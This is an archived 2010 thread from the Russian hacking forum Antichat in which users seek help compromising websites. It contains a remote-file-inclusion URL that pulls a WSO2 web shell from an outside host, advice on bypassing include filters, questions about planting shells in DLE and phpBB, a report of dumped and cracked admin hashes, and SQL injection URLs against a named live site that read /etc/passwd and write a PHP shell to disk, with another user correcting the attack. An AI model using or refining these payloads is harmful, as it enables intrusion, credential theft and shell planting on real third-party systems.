Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.04.2010, 05:10
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от kirill1927
Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ
есть ли возможность обойти фильтрацию ?
/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp
|
|
|
12.04.2010, 07:21
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 12
Провел на форуме:
293510
Репутация:
2
|
|
Сообщение от Ctacok
/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp
Warning: require_once() [function.require-once]: URL file-access is disabled in the server configuration
|
|
|
|
12.04.2010, 17:15
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
никто не знает как в DLE шелл залить ?!
|
|
|
|
12.04.2010, 17:46
|
|
Новичок
Регистрация: 12.02.2010
Сообщений: 3
Провел на форуме:
2379
Репутация:
0
|
|
Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
|
|
|
|
12.04.2010, 17:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от mayhem
Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
залить файл даже с правами админа не можешь
|
|
|
|
12.04.2010, 17:53
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Konqi
залить файл даже с правами админа не можешь
https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 
Сообщение от Konqi
не знал,спс 
а есть ли возможность во втором версии? https://forum.antichat.ru/showpost.php?p=198446&postcount=3
Последний раз редактировалось .:[melkiy]:.; 12.04.2010 в 18:31..
|
|
|
|
12.04.2010, 18:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от .:[melkiy]:.
https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 не знал,спс
а есть ли возможность во втором версии?
Последний раз редактировалось Konqi; 12.04.2010 в 18:17..
|
|
|
|
12.04.2010, 18:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
C одного ресурса вытащил хеши от всего от админки от ПМА и от форума и расшифровал (есть и инклуд, вытащил все конфиги тоже) но никуда не пускает, видимо сервер с вебом находится в локалки доступ к ктоторой идет через прокс.
Код:
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http-proxy Squid webproxy 2.6.STABLE21
443/tcp closed https
что можно сделать ? как можно обойти ? |
|
|
|
12.04.2010, 20:14
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
52122
Репутация:
-6
|
|
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
тут File_Priv на Y..
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16,17+from+mysql.user--
путь вроде /home/sites/mindviz/mail/
делаю так
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,<?include($_GET[сmd]);?>,10,11,12,13,14,15,16,17+from+mysql.user+into+ outfile+'/home/sites/mindviz/mail/shell.php'--
что не так..??
http://mindviz.com/shell.php?cmd=phpinfo(); че не идет?
|
|
|
|
12.04.2010, 20:26
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
papst
Путь неправильный. Вдобавок 9ое поле не выводится. Бери 7ое например.
И надеюсь ты понимаешь, что твой "шелл" делает?
PS into outfile и затем load_file() даже в /tmp/ не проходит.
Последний раз редактировалось budden; 12.04.2010 в 20:32..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
